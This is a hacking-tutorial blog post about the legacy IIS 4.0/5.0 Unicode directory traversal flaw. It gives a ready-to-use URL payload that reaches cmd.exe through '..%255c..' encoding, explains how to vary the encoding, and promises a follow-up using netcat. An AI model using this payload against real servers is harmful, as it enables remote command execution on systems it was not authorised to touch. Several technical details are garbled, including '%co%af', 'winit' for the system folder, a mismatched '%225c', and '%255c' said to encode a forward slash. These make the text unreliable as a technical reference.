Unicode Exploit And Directory Transversal ~ Devil's Blog On Security

A DEVIL'S BLOG ON COMPUTER AND INFORMATION SECURITY, ETHICAL HACKING AND COUNTERMEASURES

Learn Ethical Hacking | Learn Hacking Online | Learn How To Hack|Hack Counter Hack| Ethical Hacking Tutorials

Unicode Exploit And Directory Transversal

Unicode contains more 10, 00,000 characters. Unicode contains large number of characters to support all letters and words present in dialect of any language of any country or region. Any character in Unicode is represented in form of a code, for example a dot or period symbol is represented with %2E and a slash by %co%af. Unicode allows multiple encoding for each character depending upon its transfer format, for example UTF-8 provides several encoding for single character.

By default all Unicode extensions are installed while installing Microsoft server IIS 4.0 or 5.0. We all know at present IIS 7 is available then why we are discussing on IIS 4.0 and IIS 5.0. Actually we are not discussing IIS 4.0 we are discussing IIS 5.0 because it is installed with Windows 2000 and 2003 server by default and there are many sites which are still running IIS 5.0. So if the attacker finds that someone is running on old system he/she’ll surely take advantage of this. Read banner grabbing and methods to grab banner for more information.

http://example.com/scripts/..%255c../winit/system32/cmd.exe?/c+cd+c:

Look at above URL the above URL consist of “..%255c..” when encoded in Unicode turns into “..” which is known as directory transversal. Just after cmd.exe you can see a question mark (?) it means execute a command line argument, the plus sign (+) means space between two arguments. The above URL is equivalent to,

http://example.com/scripts/../../winit/system32/cmd.exe?/c+cd+c:

But by default IIS does not allow above URL so attacker changes ‘/’ by “%255c”. And since the Unicode encoder and decoder in IIS are faulty it passes malformed URL by validating it. You can also use %%35c instead of %225c, in fact you can use anything that encodes to ‘/’. Since IIS Unicode exploit uses HTTP protocol the attack can be directly performed from web browser without any extra tools. Also note that number of../ ie %255c does not matter until there are enough directories to transverse backwards. Now though the shell can be achieved remotely due to this vulnerability but due to its non-interactive nature you can not run commands that need admin privileges from your web browser.

In next part to it we will discus how this vulnerability can be exploited using our favorite tool netcat. Till then thanks for reading, have a nice time and keep visiting.